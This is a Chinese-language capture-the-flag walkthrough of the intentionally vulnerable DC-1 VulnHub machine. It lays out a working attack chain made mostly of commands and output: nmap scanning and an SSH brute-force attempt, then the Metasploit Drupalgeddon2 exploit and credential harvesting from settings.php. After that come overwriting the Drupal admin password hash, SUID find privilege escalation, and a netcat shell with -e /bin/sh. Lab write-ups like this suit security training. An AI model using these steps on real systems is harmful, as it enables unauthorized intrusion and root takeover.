文章前提概述
本文介紹DC-1靶機的滲透測驗流程
涉及知識點(比較基礎):
nmap掃描網段埠服務
msf的漏洞搜索
drupal7的命令執行利用
netcat反向shell
mysql的基本操作
sudi提權
基本環境搭建
靶機下載地址:http://www.five86.com/downloads/DC-1.zip
https://download.vulnhub.com/dc/DC-1.zip
VMware(windows):https://www.52pojie.cn/thread-1026907-1-1.html
選擇高版本的vmware,不然可能不支持ova匯入
下載匯入開機vmware設定選擇nat模式,目的讓你的攻擊機和靶機在一個網段,可以根據網路環境自行設定只要在一個網段就行,
基礎資訊收集
nmap掃描
nmap -A 192.168.124.0/24
掃描結果
開發80,111,22ssh埠
Host is up (0.00039s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey:
| 1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
| 2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
|_ 256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Debian))
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: Welcome to Drupal Site | Drupal Site
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 37454/udp status
| 100024 1 39208/udp6 status
| 100024 1 52048/tcp status
|_ 100024 1 57763/tcp6 status
MAC Address: 00:0C:29:A6:59:A3 (VMware)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.16
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.39 ms 192.168.124.145
先爆破一下ssh吧(無結果)
nmap --script=ssh-brute 192.168.124.145
訪問80埠
嘗試了注冊,登錄的弱密碼,修改密碼,無效,但發現admin用戶存在
wappalyzer指紋識別,發現室Drupal系統
去漏洞庫和msf搜索一下
msfconsole
search Drupal
發現有漏洞可以用那就開始msf吧
使用2018年的漏洞吧,是個遠程代碼執行(代碼審計現在真心看不懂,??)
https://www.exploit-db.com/exploits/44482
https://paper.seebug.org/567/
msf發現連接成功
use exploit/unix/webapp/drupal_drupalgeddon2
set RHOSTS 192.168.124.145
run
尋找一下flag
shell
find / -name flag*
/home/flag4
/home/flag4/flag4.txt
/var/www/flag1.txt
打開flag1.txt試試
cat /var/www/flag1.txt
翻譯一下:每一個好的CMS都需要一個組態檔--你也一樣,
搜索Drupal的組態檔
/var/www/sites/default/settings.php,打開
cat /var/www/sites/default/settings.php
*
* flag2
* Brute force and dictionary attacks aren't the
* only ways to gain access (and you WILL need access).
* What can you do with these credentials?
*
*/
$databases = array (
'default' =>
array (
'default' =>
array (
'database' => 'drupaldb',
'username' => 'dbuser',
'password' => 'R0ck3t',
'host' => 'localhost',
'port' => '',
'driver' => 'mysql',
'prefix' => '',
),
),
);
發現了flag2和資料庫的賬號密碼,嘗試連接一下
先弄一下互動shell吧
python -c 'import pty;pty.spawn("/bin/bash")'
連接資料庫嘗試一下
mysql -u dbuser -p R0ck3t
查看一下node和user表,發現flag3
select * from node;
select * from users;
為什么要看node表呢???(user表就不說了吧)
因為drupal node機制
drupal node機制理解
so,嘗試獲得登錄的密碼,hash值破解可能不太現實
我們注冊一個賬號將二者hash互換不就可以了
我丟不行,注冊沒法寫密碼,
那找到加密腳本自己加密一個不就行了
加密腳本位置
scripts/password-hash.sh
php scripts/password-hash.sh admin
password: admin hash: $S$DyyA5HnUonyq8xJJZeWKGIsIxaDpzGM6jbKqPiERZ/lLMnsWkUB.
嘗試更換管理員密碼的hash
update users set pass='$S$DyyA5HnUonyq8xJJZeWKGIsIxaDpzGM6jbKqPiERZ/lLMnsWkUB.' where name='admin';
下面登錄測驗一下,賬號admin密碼admin
在content中發現
Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.
也就是說我們需要尋找密碼,而且提示shadow,之前的flag4還沒看
Can you use this same method to find or access the flag in root?
Probably. But perhaps it's not that easy. Or maybe it is?
應該是讓獲得管理員權限,再去/etc/shadow看看
嘗試給權限,還是不行
那只能嘗試提權了
suid提權
SUID是set uid的簡稱,它出現在檔案所屬主權限的執行位上面,標志為 s ,當設定了SUID后,UMSK第一位為4,我們知道,我們賬戶的密碼檔案存放在/etc/shadow中,而/etc/shadow的權限為 ----------,也就是說:只有root用戶可以對該目錄進行操作,而其他用戶連查看的權限都沒有,當普通用戶要修改自己的密碼的時候,可以使用passwd這個指令,passwd這個指令在/bin/passwd下,當我們執行這個命令后,就可以修改/etc/shadow下的密碼了,那么為什么我們可以通過passwd這個指令去修改一個我們沒有權限的檔案呢?這里就用到了suid,suid的作用是讓執行該命令的用戶以該命令擁有者即root的權限去執行,意思是當普通用戶執行passwd時會擁有root的權限,這樣就可以修改/etc/passwd這個檔案了,
參考文章:Linux下的用戶、組和權限
已知的可用來提權的linux可行性的檔案串列如下:
nmap,vim,find,bash,more,less,nano,cp
發現系統上運行的所有SUID可執行檔案
不同系統適用于不同的命令
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000-print2>/dev/null
find / -user root -perm -4000-exec ls -ldb {} \;
嘗試查看find是否有suid權限
/usr/bin/find /tmp -exec whoami \;
find 命令說明
-exec 引數后面跟的是command命令,它的終止是以;為結束標志的,所以這句命令后面的分號是不可缺少的,考慮到各個系統中分號會有不同的意義,所以前面加反斜杠,-exec引數后面跟的就是我們想進一步操作的命令,so,我們可以以root的權限命令執行了
反彈一個shell,當然find和執行命令,我們也可以回傳一個root的netcat的后門
/usr/bin/find ./aaa -exec '/bin/sh' \;
/usr/bin/find ./aaa -exec netcat -lvp 4444 -e "/bin/sh" \;
netcat 192.168.124.145 4444
最后,獲得最后一個flag
cat thefinalflag.txt
Well done!!!!
Hopefully you've enjoyed this and learned some new skills.
You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7
參考文章及說明
freebuf:https://www.freebuf.com/articles/network/218073.html
知乎:https://zhuanlan.zhihu.com/p/135342104
W3:https://medium.com/@w3rallmachines/dc-1-vulnhub-walkthrough-3a2e7042c640
最后歡迎訪問我的個人博客:https://lmg66.github.io/
說明:本文僅限技術研究與討論,嚴禁用于非法用途,否則產生的一切后果自行承擔
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/205067.html
標籤:其他